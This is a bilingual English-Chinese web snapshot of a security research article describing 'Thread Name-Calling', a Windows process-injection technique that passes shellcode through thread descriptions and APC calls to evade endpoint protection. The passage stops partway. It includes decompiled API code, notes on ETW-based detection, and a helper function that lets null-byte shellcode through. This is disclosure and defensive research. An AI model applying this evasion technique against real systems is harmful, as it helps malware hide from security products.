这是用户在 2024-10-21 10:33 为 https://research.checkpoint.com/2024/thread-name-calling-using-thread-name-for-offense/ 保存的双语快照页面,由 沉浸式翻译 提供双语支持。了解如何保存?

CATEGORIES 类别

Thread Name-Calling – using Thread Name for offense
线程名称调用 – 使用线程名称进行冒犯

July 25, 2024  7月 25, 2024

Research by: hasherezade
研究者: hasherezade

Highlights: 突出:

  • Process Injection is one of the important techniques in the attackers’ toolkit.
    进程注入是攻击者工具包中的重要技术之一。
  • In the following write-up, Check Point Research (CPR) explains how the API for thread descriptions can be abused to bypass endpoint protection products.
    在以下文章中,Check Point Research (CPR) 解释了如何滥用线程描述 API 来绕过端点保护产品。
  • We propose a new injection technique: Thread Name-Calling, and offer the advisory related to implementing protection.
    我们提出了一种新的注入技术:Thread Name-Calling,并提供了与实施保护相关的咨询。

Introduction 介绍

Process injection is one of the important techniques used by attackers. We can find its variants implemented in almost every malware. It serves purposes such as:
进程注入是攻击者使用的重要技术之一。我们可以发现它的变体几乎在所有恶意软件中都实现了。它的作用包括:

  • defense evasion: hiding malicious modules under the cover of a different process
    防御规避:将恶意模块隐藏在不同进程的掩护下
  • interference in the existing process: reading its memory, hooking the used API, etc.
    对现有进程的干扰:读取其内存、挂接使用的 API 等。
  • privilege escalation 权限提升

Due to the fact that interference in the memory of a process by malicious modules can cause a lot of damage, all sorts of AV and EDR products monitor such behaviors and try to prevent them. However, this monitoring is based on the knowledge about the common APIs used in implementations of the injection methods. This cat-and-mouse game never ends. Cybercriminals, as well as red teamers, keep trying to break the known patterns, by using some atypical APIs, and thanks to this, to evade the detection implemented at the time. One example of this is the Atom Bombing technique (from 2016), which uses the Atom Table to pass the code into the remote process, or the recently introduced Pool Party (from 2023), where the thread pools were abused to run the code in the context of a different process, without the EDRs noticing it. The diversity of the APIs used has been very well described in the paper “Windows Process Injection in 2019” by Amit Klein and Itzik Kotler.
由于恶意模块对进程内存的干扰会造成很大的损害,因此各种 AV 和 EDR 产品都会监控此类行为并试图防止它们。但是,此监视基于有关注入方法实现中使用的常见 API 的知识。这场猫捉老鼠的游戏永无止境。网络犯罪分子以及红队成员不断试图通过使用一些非典型 API 来打破已知模式,因此,可以逃避当时实施的检测。这方面的一个例子是 Atom Bombing 技术(从 2016 年开始),它使用 Atom Table 将代码传递到远程进程,或者最近引入的 Pool Party(从 2023 年开始),其中线程池被滥用在不同进程的上下文中运行代码,而 EDR 没有注意到它。Amit Klein 和 Itzik Kotler 的论文“2019 年的 Windows 进程注入”中已经很好地描述了所用 API 的多样性。

Thread Name-Calling is yet another take on this topic. It is a technique allowing to implant a shellcode into a running process, using the following Windows APIs:
线程名称调用是此主题的另一种方式。这是一种允许使用以下 Windows API 将 shellcode 植入正在运行的进程中的技术:

  • GetThreadDescriptionSetThreadDescription (introduced in Windows 10, 1607) – an API for setting and retrieving the thread description (a.k.a. thread name)
    GetThreadDescription/ SetThreadDescription(在 Windows 10、1607 中引入)– 用于设置和检索线程描述(又名线程名称)的 API
  • ZwQueueApcThreadEx2 (introduced in Windows 10, 19045) – a new API for Asynchronous Procedure Calls (APC)
    ZwQueueApcThreadEx2 (在 Windows 10、19045 中引入) – 用于异步过程调用 (APC) 的新 API

The remote memory allocation, and writing to it, is achieved on the process using a handle without the write access (PROCESS_VM_WRITE). Thanks to this feature, and also due to the fact that the APIs we used are not commonly associated with process injection, we were able to bypass some of the major AV and EDR products. In this blog we elaborate on the implementation details of this new technique and suggest some possible detection methods.
远程内存分配和写入它是使用没有写入访问权限 (PROCESS_VM_WRITE 的句柄在进程上实现的。多亏了这个功能,也因为我们使用的 API 通常与进程注入无关,我们能够绕过一些主要的 AV 和 EDR 产品。在这篇博客中,我们详细阐述了这项新技术的实现细节,并提出了一些可能的检测方法。

Thread Name in offensive use-cases
冒犯性用例中的线程名称

Before we begin, note that the involved functions are relatively new, and are not used in any well-established injection methods. However, they are not “brand new” – they have been added a few years ago, so naturally we are not the first ones to research about their potential for offensive scenarios. Some of the related uses were discussed on X/Twitter (we found a question by Adam “Hexacorn” from 2020, and by Gal Yaniv from 2021 referencing those APIs). We tried to collect the various use-cases to the best of our abilities, and list the related PoCs.
在开始之前,请注意所涉及的函数相对较新,并且未在任何成熟的注入方法中使用。然而,它们并不是“全新的”——它们是几年前添加的,所以自然我们不是第一个研究它们在进攻场景中的潜力的人。在 X/Twitter 上讨论了一些相关用途(我们发现了 Adam “Hexacorn” 在 2020 年2021 年提出的一个问题,其中提到了这些 API)。我们试图尽我们所能收集各种用例,并列出相关的 PoC。

Get/SetThreadDescription may be utilized in:
Get/SetThreadDescription 可用于:

  • undocumented IPC: a thread name is used as a “mailbox” via which two processes are exchanging messages. The sender process can pass information to a receiver process by setting a description on one of its threads. The receiver reads the description from the thread and process it further.
    未记录的 IPC:线程名称用作两个进程交换消息的“邮箱”。发送方进程可以通过在接收方进程的其中一个线程上设置说明来将信息传递给接收方进程。接收方从线程中读取描述并进一步处理它。
  • hiding inactive code implant from a memory scan. This idea is similar to ShellcodeFluctuation, but instead of / in addition to encryption, we temporarily store the code as a thread name (which is a kernel mode structure), out of the working set – that means, out of sight of the user mode memory scanners. It will be repeatedly retrieved into the working set, executed for a small time slot, then stored again as the thread name.
    在内存扫描中隐藏 Inactive Code Implant。这个想法类似于 ShellcodeFluctuation,但不是 / 除了加密之外,我们还将代码临时存储为线程名称(这是一个内核模式结构),在工作集之外——这意味着,在用户模式内存扫描器的视线之外。它将被重复检索到工作集中,执行一小段时间,然后再次存储为线程名称。
  • allocating memory in the kernel mode from user mode so that it can be further used in scenarios related to kernel mode exploitation
    从用户模式分配内核模式的内存,以便进一步用于内核模式开发相关的场景
  • remote code injection  远程代码注入
    • “DoubleBarrel” – by Sam Russel, 2022 : https://www.lodsb.com/shellcode-injection-using-threadnameinformation : injects code using a variant of thread hijacking, redirecting the thread execution to the ROP chain that is facilitated by a content passed via the thread name. This technique does not create additional executable memory space – that gives it a potential to evade some detections. The downsides are the limitations imposed on the shellcode (it must be a handcrafted ROP chain, containing gadgets specific to the particular version of Windows), and the possible instability of the target application after the shellcode execution. Also, use of the API for direct thread manipulation is prone to trigger alerts.
      “DoubleBarrel” – 作者:Sam Russel,2022 年:https://www.lodsb.com/shellcode-injection-using-threadnameinformation:使用线程劫持的变体注入代码,将线程执行重定向到 ROP 链,该链由通过线程名称传递的内容促进。这种技术不会产生额外的可执行内存空间,因此有可能逃避某些检测。缺点是对 shellcode 施加的限制(它必须是手工制作的 ROP 链,包含特定于特定 Windows 版本的小工具),以及 shellcode 执行后目标应用程序可能不稳定。此外,使用 API 进行直接线程操作很容易触发警报。
    • “Thread Name-Calling injection” – the technique introduced in this article. The code to be injected is passed as a thread description to the target. Next, the function GetThreadDescription is called remotely on the target, via APC, causing the description buffer to be copied into the target’s working set. After making the buffer executable, it is run using another APC call. It supports any custom shellcode. This technique does not corrupt the original thread: the target application seamlessly continues its execution.
      “线程名称调用注入” – 本文中介绍的技术。要注入的代码将作为线程描述传递给目标。接下来,通过 APC 在目标上远程调用函数 GetThreadDescription,从而将描述缓冲区复制到目标的工作集中。使缓冲区可执行后,使用另一个 APC 调用运行它。它支持任何自定义 shellcode。此技术不会损坏原始线程:目标应用程序无缝地继续执行。
  • DLL injection variant: typically for this technique, we write a path to our DLL into the address space of the target, and then remotely call LoadLibrary to get the DLL loaded within the target. In contrast to the classic implementation that uses VirtualAllocEx and WriteProcessMemory, here the path of the DLL is passed via thread name (remote write achieved as in the Thread Name-Calling).
    • This technique is described in the “Bonus” section of this article.

The APIs Used

Lets start by looking at the APIs that are vital for the introduced technique. Understanding the details of their implementation is crucial for explaining the further abuse.

GetThreadDescription / SetThreadDescription

Since Windows 10, 1607 the following functions were added to the Windows API:

GetThreadDescription

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
HRESULT GetThreadDescription(
[in] HANDLE hThread,
[out] PWSTR *ppszThreadDescription
);
HRESULT GetThreadDescription( [in] HANDLE hThread, [out] PWSTR *ppszThreadDescription );
HRESULT GetThreadDescription(
 [in] HANDLE hThread,
 [out] PWSTR *ppszThreadDescription 
);

SetThreadDescription

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
HRESULT SetThreadDescription(
[in] HANDLE hThread,
[in] PCWSTR lpThreadDescription
);
HRESULT SetThreadDescription( [in] HANDLE hThread, [in] PCWSTR lpThreadDescription );
HRESULT SetThreadDescription(
 [in] HANDLE hThread,
 [in] PCWSTR lpThreadDescription 
);

Their expected usage is related to setting the description (name) of a thread. That enables us to identify its functionality, and can help i.e. in debugging. However, if we look at this API with an offensive mindset, we can quickly see some potential for misuse.
它们的预期用法与设置线程的描述 (name) 有关。这使我们能够识别其功能,并可以帮助进行调试。但是,如果我们以冒犯性的心态看待这个 API,我们很快就会看到一些潜在的滥用。

To set the name, we need to open a handle to the thread with the access flag THREAD_SET_LIMITED_INFORMATION. Under this minimal requirement, we can attach our arbitrary buffer to any thread of a remote process.
要设置名称,我们需要打开线程的句柄 访问标志 THREAD_SET_LIMITED_INFORMATION .在这个最低要求下,我们可以将任意缓冲区附加到远程进程的任何线程。

The buffer must be a Unicode string, which basically means, any buffer terminated by a L'\0'(double NULL byte). The size that we can allocate is pretty generous: 0x10000 bytes  – of which, according to experiments, we can use (0x10000 - 2) for our data buffer (including the terminator). This is an equivalent of almost 16 pages of data, which is well enough to store a block of shellcode…
缓冲区必须是 Unicode 字符串,这基本上意味着任何以 L'\0'(双 NULL 字节)结尾的缓冲区。我们可以分配的大小非常大:0x10000 字节 – 根据实验,我们可以将 (0x10000 - 2) 用于我们的数据缓冲区(包括终止符)。这相当于将近 16 页的数据,足以存储一段 shellcode......

API Implementation API 实现

The described functions are implemented in Kernelbase.dll.
所描述的函数以 Kernelbase.dll 实现。

  1. SetThreadDescription:
    SetThreadDescription
Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
#define ThreadNameInformation 0x26
HRESULT __stdcall SetThreadDescription(HANDLE hThread, PCWSTR lpThreadDescription)
{
NTSTATUS status; // eax
struct _UNICODE_STRING DestinationString;
status = RtlInitUnicodeStringEx(&DestinationString, lpThreadDescription);
if ( status >= 0 )
status = NtSetInformationThread(hThread, ThreadNameInformation, &DestinationString, 0x10u);
return status | 0x10000000;
}
#define ThreadNameInformation 0x26 HRESULT __stdcall SetThreadDescription(HANDLE hThread, PCWSTR lpThreadDescription) { NTSTATUS status; // eax struct _UNICODE_STRING DestinationString; status = RtlInitUnicodeStringEx(&DestinationString, lpThreadDescription); if ( status >= 0 ) status = NtSetInformationThread(hThread, ThreadNameInformation, &DestinationString, 0x10u); return status | 0x10000000; }
#define ThreadNameInformation 0x26

HRESULT __stdcall SetThreadDescription(HANDLE hThread, PCWSTR lpThreadDescription)
{
  NTSTATUS status; // eax
  struct _UNICODE_STRING DestinationString;

  status = RtlInitUnicodeStringEx(&DestinationString, lpThreadDescription);
  if ( status >= 0 )
    status = NtSetInformationThread(hThread, ThreadNameInformation, &DestinationString, 0x10u);
  return status | 0x10000000;
}

This function expects us to pass a Unicode string buffer (WCHAR*), from which it creates a UNICODE_STRING structure, that is passed further. Looking at the implementation, we can see that the setting of the string onto the thread is implemented by NtSetInformationThread. The returned value is a result of the aforementioned low-level API converted from NTSTATUS to HRESULT, by setting FACILITY_NT_BIT ( 0x10000000 ).
此函数要求我们传递一个 Unicode 字符串缓冲区 (WCHAR*),从该缓冲区创建一个 UNICODE_STRING 结构,该结构将进一步传递。查看实现,我们可以看到线程上的字符串设置是由 NtSetInformationThread 实现的。返回的值是上述低级 API 通过设置 FACILITY_NT_BIT ( 0x10000000 ) 从 NTSTATUS 转换为 HRESULT 的结果。

In our implementation of a remote write, we start by calling SetThreadDescription on a remote thread, making it hold our buffer.
在远程写入的实现中,我们首先在远程线程上调用 SetThreadDescription,使其保存我们的缓冲区。

  1. GetThreadDescription:
    GetThreadDescription 中:
Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
HRESULT __stdcall GetThreadDescription(HANDLE hThread, PWSTR *ppszThreadDescription)
{
SIZE_T struct_len; // rbx
SIZE_T struct_size; // r8
NTSTATUS res; // eax
NTSTATUS status; // ebx
const UNICODE_STRING *struct_buf; // rdi
ULONG ReturnLength; // [rsp+58h] [rbp+10h] BYREF
*ppszThreadDescription = nullptr;
LODWORD(struct_len) = 144;
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, 0);
for ( struct_size = 146; ; struct_size = struct_len + 2 )
{
struct_buf = (const UNICODE_STRING *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, struct_size);
if ( !struct_buf )
{
status = 0xC0000017;
goto finish;
}
res = NtQueryInformationThread(
hThread,
ThreadNameInformation,
(PVOID)struct_buf,
struct_len,
&ReturnLength);
status = res;
if ( res != 0xC0000004 && res != 0xC0000023 && res != 0x80000005 )
break;
struct_len = ReturnLength;
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, (PVOID)struct_buf);
}
if ( res >= 0 )
{
ReturnLength = struct_buf->Length;
// move the buffer to the beginning of the structure
memmove_0((void *)struct_buf, struct_buf->Buffer, ReturnLength);
// null terminate the buffer
*(&struct_buf->Length + ((unsigned __int64)ReturnLength >> 1)) = 0;
// fill in the passed pointer
*ppszThreadDescription = &struct_buf->Length;
struct_buf = 0i64;
}
finish:
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, (PVOID)struct_buf);
return status | 0x10000000;
}
HRESULT __stdcall GetThreadDescription(HANDLE hThread, PWSTR *ppszThreadDescription) { SIZE_T struct_len; // rbx SIZE_T struct_size; // r8 NTSTATUS res; // eax NTSTATUS status; // ebx const UNICODE_STRING *struct_buf; // rdi ULONG ReturnLength; // [rsp+58h] [rbp+10h] BYREF *ppszThreadDescription = nullptr; LODWORD(struct_len) = 144; RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, 0); for ( struct_size = 146; ; struct_size = struct_len + 2 ) { struct_buf = (const UNICODE_STRING *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, struct_size); if ( !struct_buf ) { status = 0xC0000017; goto finish; } res = NtQueryInformationThread( hThread, ThreadNameInformation, (PVOID)struct_buf, struct_len, &ReturnLength); status = res; if ( res != 0xC0000004 && res != 0xC0000023 && res != 0x80000005 ) break; struct_len = ReturnLength; RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, (PVOID)struct_buf); } if ( res >= 0 ) { ReturnLength = struct_buf->Length; // move the buffer to the beginning of the structure memmove_0((void *)struct_buf, struct_buf->Buffer, ReturnLength); // null terminate the buffer *(&struct_buf->Length + ((unsigned __int64)ReturnLength >> 1)) = 0; // fill in the passed pointer *ppszThreadDescription = &struct_buf->Length; struct_buf = 0i64; } finish: RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, (PVOID)struct_buf); return status | 0x10000000; }
HRESULT __stdcall GetThreadDescription(HANDLE hThread, PWSTR *ppszThreadDescription)
{
  SIZE_T struct_len; // rbx
  SIZE_T struct_size; // r8
  NTSTATUS res; // eax
  NTSTATUS status; // ebx
  const UNICODE_STRING *struct_buf; // rdi
  ULONG ReturnLength; // [rsp+58h] [rbp+10h] BYREF

  *ppszThreadDescription = nullptr;
  LODWORD(struct_len) = 144;
  RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, 0);
  for ( struct_size = 146; ; struct_size = struct_len + 2 )
  {
    struct_buf = (const UNICODE_STRING *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, struct_size);
    if ( !struct_buf )
    {
      status = 0xC0000017;
      goto finish;
    }
    res = NtQueryInformationThread(
            hThread,
            ThreadNameInformation,
            (PVOID)struct_buf,
            struct_len,
            &ReturnLength);
    status = res;
    if ( res != 0xC0000004 && res != 0xC0000023 && res != 0x80000005 )
      break;
    struct_len = ReturnLength;
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, (PVOID)struct_buf);
  }
  if ( res >= 0 )
  {
    ReturnLength = struct_buf->Length;
    // move the buffer to the beginning of the structure
    memmove_0((void *)struct_buf, struct_buf->Buffer, ReturnLength);
    // null terminate the buffer
    *(&struct_buf->Length + ((unsigned __int64)ReturnLength >> 1)) = 0;
    // fill in the passed pointer
    *ppszThreadDescription = &struct_buf->Length;
    struct_buf = 0i64;
  }
finish:
  RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, (PVOID)struct_buf);
  return status | 0x10000000;
}

Analyzing this function reveals some other interesting implementation details. The buffer for the thread name that we want to retrieve is allocated on a heap within the retrieving process. The function automatically allocates a size that can fit the relevant UNICODE_STRING. It then erases the initial fields of the structure (Length and MaximumLength), and moves the buffer content towards the beginning of the structure, transforming it into a simple, null-terminated wide string. Next, the pointer to this new buffer is filled into the variable passed by the caller.
分析此函数可揭示其他一些有趣的实现细节。我们要检索的线程名称的缓冲区是在检索进程中的堆上分配的。该函数会自动分配适合相关UNICODE_STRING的大小。然后,它会擦除结构的初始字段 (LengthMaximumLength) ,并将缓冲区内容移动到结构的开头,将其转换为简单的以 null 结尾的宽字符串。接下来,指向此新缓冲区的指针将填充到调用方传递的变量中。

If we call GetThreadDescription remotely, in the context of the target process, we gain a remote allocation of a buffer on the heap, plus, getting it filled with our content.
如果我们远程调用 GetThreadDescription,则在目标进程的上下文中,我们可以在堆上远程分配缓冲区,此外,还可以用我们的内容填充它。

Location of the structure

Looking at the implementation, we can notice that a buffer that we retrieve via GetThreadDescription is just a local copy. Now the question is: where is the original UNICODE_STRING, associated with the thread, stored? To learn more we need to look into the Windows kernel (ntoskrnl.exe), at the implementation of the syscalls that set /read it ( NtSetInformationThread and NtQueryInformationThread).

It turns out this buffer is stored in the Kernel Mode, represented by the field in ETHREAD → ThreadName.

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
lkd> dt nt!_ETHREAD
[...]
+0x610 ThreadName : Ptr64 _UNICODE_STRING
[...]
lkd> dt nt!_ETHREAD [...] +0x610 ThreadName : Ptr64 _UNICODE_STRING [...]
   lkd> dt nt!_ETHREAD
   [...]
   +0x610 ThreadName       : Ptr64 _UNICODE_STRING
   [...]

Fragment of NtSetInformationThread responsible for setting the thread name (in Kernel Mode):

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
[...]
Length = Src.Length;
if ( (Src.Length & 1) != 0 || Src.Length > Src.MaximumLength )
{
status = 0xC000000D; // STATUS_INVALID_PARAMETER -> invalid buffer size supplied
}
else
{
PoolWithTag = ExAllocatePoolWithTag(NonPagedPoolNx, Src.Length + 16i64, 'mNhT'); // allocating a buffer on non paged pool, with tag 'ThNm'
threadName = PoolWithTag;
v113 = PoolWithTag;
if ( PoolWithTag )
{
p_Length = &PoolWithTag[1].Length;
threadName->Buffer = p_Length;
threadName->Length = Length;
threadName->MaximumLength = Length;
memmove(p_Length, Src.Buffer, Length);
eThread = Object;
PspLockThreadSecurityExclusive(Object, CurrentThread);
v105 = 1;
P = eThread->ThreadName;
eThread->ThreadName = threadName;
threadName = 0i64;
v113 = 0i64;
EtwTraceThreadSetName(eThread);
goto finish;
}
status = 0xC000009A;
}
}
else
{
status = 0xC0000004;
}
v104 = status;
finish:
[...]
[...] Length = Src.Length; if ( (Src.Length & 1) != 0 || Src.Length > Src.MaximumLength ) { status = 0xC000000D; // STATUS_INVALID_PARAMETER -> invalid buffer size supplied } else { PoolWithTag = ExAllocatePoolWithTag(NonPagedPoolNx, Src.Length + 16i64, 'mNhT'); // allocating a buffer on non paged pool, with tag 'ThNm' threadName = PoolWithTag; v113 = PoolWithTag; if ( PoolWithTag ) { p_Length = &PoolWithTag[1].Length; threadName->Buffer = p_Length; threadName->Length = Length; threadName->MaximumLength = Length; memmove(p_Length, Src.Buffer, Length); eThread = Object; PspLockThreadSecurityExclusive(Object, CurrentThread); v105 = 1; P = eThread->ThreadName; eThread->ThreadName = threadName; threadName = 0i64; v113 = 0i64; EtwTraceThreadSetName(eThread); goto finish; } status = 0xC000009A; } } else { status = 0xC0000004; } v104 = status; finish: [...]
[...]
          Length = Src.Length;
          if ( (Src.Length & 1) != 0 || Src.Length > Src.MaximumLength )
          {
            status = 0xC000000D; // STATUS_INVALID_PARAMETER -> invalid buffer size supplied
          }
          else
          {
            PoolWithTag = ExAllocatePoolWithTag(NonPagedPoolNx, Src.Length + 16i64, 'mNhT'); // allocating a buffer on non paged pool, with tag 'ThNm'
            threadName = PoolWithTag;
            v113 = PoolWithTag;
            if ( PoolWithTag )
            {
              p_Length = &PoolWithTag[1].Length;
              threadName->Buffer = p_Length;
              threadName->Length = Length;
              threadName->MaximumLength = Length;
              memmove(p_Length, Src.Buffer, Length);
              eThread = Object;
              PspLockThreadSecurityExclusive(Object, CurrentThread);
              v105 = 1;
              P = eThread->ThreadName;
              eThread->ThreadName = threadName;
              threadName = 0i64;
              v113 = 0i64;
              EtwTraceThreadSetName(eThread);
              goto finish;
            }
            status = 0xC000009A;
          }
        }
        else
        {
          status = 0xC0000004;
        }
        v104 = status;
finish:
[...]

As we can see, the buffer is allocated on NonPagedPoolNx (non-executable non-paged pool). The allocated buffer is filled with the UNICODE_STRING, and its pointer is stored in ThreadName within the ETHREAD structure of a particular thread.
正如我们所看到的,缓冲区是在 NonPagedPoolNx(不可执行的非分页池)上分配的。分配的缓冲区填充了 UNICODE_STRING,其指针存储在特定线程的 ETHREAD 结构内的 ThreadName 中。

The event of setting the ThreadName is registered by ETW (Event Tracing for Windows), which can be further used to detect this injection method. The generated event collects data such as ProcessID and ThreadID, which are required to identify the thread and the ThreadName that was set.
设置 ThreadName 的事件由 ETW (Event Tracing for Windows) 注册,ETW 可以进一步用于检测此注入方法。生成的事件收集 ProcessID 和 ThreadID 等数据,这些数据是标识线程和设置的 ThreadName 所必需的。

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
__int64 __fastcall EtwTraceThreadSetName(_ETHREAD *thread)
{
int v1; // r10d
_UNICODE_STRING *ThreadName; // rax
__int64 *Buffer; // rcx
unsigned int Length; // edx
unsigned __int64 len; // rax
int v7[4]; // [rsp+30h] [rbp-50h] BYREF
__int64 v8[2]; // [rsp+40h] [rbp-40h] BYREF
__int64 *buf; // [rsp+50h] [rbp-30h]
__int64 v10; // [rsp+58h] [rbp-28h]
__int64 *v11; // [rsp+60h] [rbp-20h]
__int64 v12; // [rsp+68h] [rbp-18h]
v7[0] = thread->Cid.UniqueProcess;
v1 = 2;
v7[1] = thread->Cid.UniqueThread;
v8[0] = v7;
ThreadName = thread->ThreadName;
v7[2] = 0;
v8[1] = 8i64;
if ( ThreadName && (Buffer = ThreadName->Buffer) != 0i64 )
{
Length = ThreadName->Length;
len = 0x800i64;
if ( Length < 0x800u )
len = Length;
buf = Buffer;
v10 = len;
if ( !len || *(Buffer + (len >> 1) - 1) )
{
v12 = 2i64;
v11 = &EtwpNull;
v1 = 3;
}
}
else
{
v10 = 2i64;
buf = &EtwpNull;
}
return EtwTraceKernelEvent(v8, v1, 2, 1352, 0x501802);
}
__int64 __fastcall EtwTraceThreadSetName(_ETHREAD *thread) { int v1; // r10d _UNICODE_STRING *ThreadName; // rax __int64 *Buffer; // rcx unsigned int Length; // edx unsigned __int64 len; // rax int v7[4]; // [rsp+30h] [rbp-50h] BYREF __int64 v8[2]; // [rsp+40h] [rbp-40h] BYREF __int64 *buf; // [rsp+50h] [rbp-30h] __int64 v10; // [rsp+58h] [rbp-28h] __int64 *v11; // [rsp+60h] [rbp-20h] __int64 v12; // [rsp+68h] [rbp-18h] v7[0] = thread->Cid.UniqueProcess; v1 = 2; v7[1] = thread->Cid.UniqueThread; v8[0] = v7; ThreadName = thread->ThreadName; v7[2] = 0; v8[1] = 8i64; if ( ThreadName && (Buffer = ThreadName->Buffer) != 0i64 ) { Length = ThreadName->Length; len = 0x800i64; if ( Length < 0x800u ) len = Length; buf = Buffer; v10 = len; if ( !len || *(Buffer + (len >> 1) - 1) ) { v12 = 2i64; v11 = &EtwpNull; v1 = 3; } } else { v10 = 2i64; buf = &EtwpNull; } return EtwTraceKernelEvent(v8, v1, 2, 1352, 0x501802); }
__int64 __fastcall EtwTraceThreadSetName(_ETHREAD *thread)
{
  int v1; // r10d
  _UNICODE_STRING *ThreadName; // rax
  __int64 *Buffer; // rcx
  unsigned int Length; // edx
  unsigned __int64 len; // rax
  int v7[4]; // [rsp+30h] [rbp-50h] BYREF
  __int64 v8[2]; // [rsp+40h] [rbp-40h] BYREF
  __int64 *buf; // [rsp+50h] [rbp-30h]
  __int64 v10; // [rsp+58h] [rbp-28h]
  __int64 *v11; // [rsp+60h] [rbp-20h]
  __int64 v12; // [rsp+68h] [rbp-18h]

  v7[0] = thread->Cid.UniqueProcess;
  v1 = 2;
  v7[1] = thread->Cid.UniqueThread;
  v8[0] = v7;
  ThreadName = thread->ThreadName;
  v7[2] = 0;
  v8[1] = 8i64;
  if ( ThreadName && (Buffer = ThreadName->Buffer) != 0i64 )
  {
    Length = ThreadName->Length;
    len = 0x800i64;
    if ( Length < 0x800u )
      len = Length;
    buf = Buffer;
    v10 = len;
    if ( !len || *(Buffer + (len >> 1) - 1) )
    {
      v12 = 2i64;
      v11 = &EtwpNull;
      v1 = 3;
    }
  }
  else
  {
    v10 = 2i64;
    buf = &EtwpNull;
  }
  return EtwTraceKernelEvent(v8, v1, 2, 1352, 0x501802);
}

Removing the NULL byte limitations

Setting the thread name by the official API imposes some limitations on the buffer. It has to be a valid Unicode string, that means, an empty WCHAR will be used as a buffer terminator. The size of WCHAR is two bytes – so if our shellcode has any double NULL byte inside only the part before it will be copied. This is a common limitation encountered whenever the shellcode is to be passed via buffer dedicated to hold strings. To solve this issue, shellcode encoders have been invented: they allow to convert a buffer into a format that is free from NULL bytes. We can use one of them in our case as well.

However, by analyzing the implementation of the above API, we realized that it is actually possible to avoid this limitation at its root. When the Thread Name is copied between different buffers, the declared length from the UNICODE_STRING structure is used, along with memmove function, which does not treat NULL bytes as terminators. The only function that imposes the NULL byte constraint is SetThreadDescription. Underneath, it calls RtlInitUnicodeStringEx that takes the passed WCHAR buffer, and uses it to initializes the UNICODE_STRING structure. The input buffer must be NULL terminated, and the length to be saved in the structure is determined basing on the position of this character.

We can create an easy workaround for our problem, by using a custom implementation of SetThreadDescription:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
HRESULT mySetThreadDescription(HANDLE hThread, const BYTE* buf, size_t buf_size)
{
UNICODE_STRING DestinationString = { 0 };
BYTE* padding = (BYTE*)::calloc(buf_size + sizeof(WCHAR), 1);
::memset(padding, 'A', buf_size);
auto pRtlInitUnicodeStringEx = reinterpret_cast<decltype(&RtlInitUnicodeStringEx)>(GetProcAddress(GetModuleHandle("ntdll.dll"), "RtlInitUnicodeStringEx"));
pRtlInitUnicodeStringEx(&DestinationString, (PCWSTR)padding);
// fill with our real content:
::memcpy(DestinationString.Buffer, buf, buf_size);
auto pNtSetInformationThread = reinterpret_cast<decltype(&NtSetInformationThread)>(GetProcAddress(GetModuleHandle("ntdll.dll"), "NtSetInformationThread"));
NTSTATUS status = pNtSetInformationThread(hThread, (THREADINFOCLASS)(ThreadNameInformation), &DestinationString, 0x10u);
::free(padding);
return HRESULT_FROM_NT(status);
}
HRESULT mySetThreadDescription(HANDLE hThread, const BYTE* buf, size_t buf_size) { UNICODE_STRING DestinationString = { 0 }; BYTE* padding = (BYTE*)::calloc(buf_size + sizeof(WCHAR), 1); ::memset(padding, 'A', buf_size); auto pRtlInitUnicodeStringEx = reinterpret_cast<decltype(&RtlInitUnicodeStringEx)>(GetProcAddress(GetModuleHandle("ntdll.dll"), "RtlInitUnicodeStringEx")); pRtlInitUnicodeStringEx(&DestinationString, (PCWSTR)padding); // fill with our real content: ::memcpy(DestinationString.Buffer, buf, buf_size); auto pNtSetInformationThread = reinterpret_cast<decltype(&NtSetInformationThread)>(GetProcAddress(GetModuleHandle("ntdll.dll"), "NtSetInformationThread")); NTSTATUS status = pNtSetInformationThread(hThread, (THREADINFOCLASS)(ThreadNameInformation), &DestinationString, 0x10u); ::free(padding); return HRESULT_FROM_NT(status); }
HRESULT mySetThreadDescription(HANDLE hThread, const BYTE* buf, size_t buf_size)
{
    UNICODE_STRING DestinationString = { 0 };
    BYTE* padding = (BYTE*)::calloc(buf_size + sizeof(WCHAR), 1);
    ::memset(padding, 'A', buf_size);

    auto pRtlInitUnicodeStringEx = reinterpret_cast<decltype(&RtlInitUnicodeStringEx)>(GetProcAddress(GetModuleHandle("ntdll.dll"), "RtlInitUnicodeStringEx"));
    pRtlInitUnicodeStringEx(&DestinationString, (PCWSTR)padding);
    // fill with our real content:
    ::memcpy(DestinationString.Buffer, buf, buf_size);

    auto pNtSetInformationThread = reinterpret_cast<decltype(&NtSetInformationThread)>(GetProcAddress(GetModuleHandle("ntdll.dll"), "NtSetInformationThread"));
    NTSTATUS status = pNtSetInformationThread(hThread, (THREADINFOCLASS)(ThreadNameInformation), &DestinationString, 0x10u);
    ::free(padding);
    return HRESULT_FROM_NT(status);
}

This function initializes UNICODE_STRING basing on a dummy buffer of a required length, and then fills it with the actual content (which may contain NULL bytes). Then, the prepared structure is passed to the thread using the low-level API: NtSetInformationThread.

NtQueueApcThreadEx2

In the implementation of our injection technique, we rely on calling some APIs remotely within the target process.

Windows supports adding routines to Asynchronous Procedure Call (APC) queue of existing threads, giving the ability to run code in a remote process without the need to create an additional thread. At a low level, this functionality is exposed by the function: NtQueueApcThreadEx(and its wrapper:NtQueueApcThread). The official, higher-level API recommended by Microsoft is QueueUserAPC – which works as a wrapper for the lower-level function. We are free to add APC to a remote thread, as long as its handle is opened with THREAD_SET_CONTEXT access.

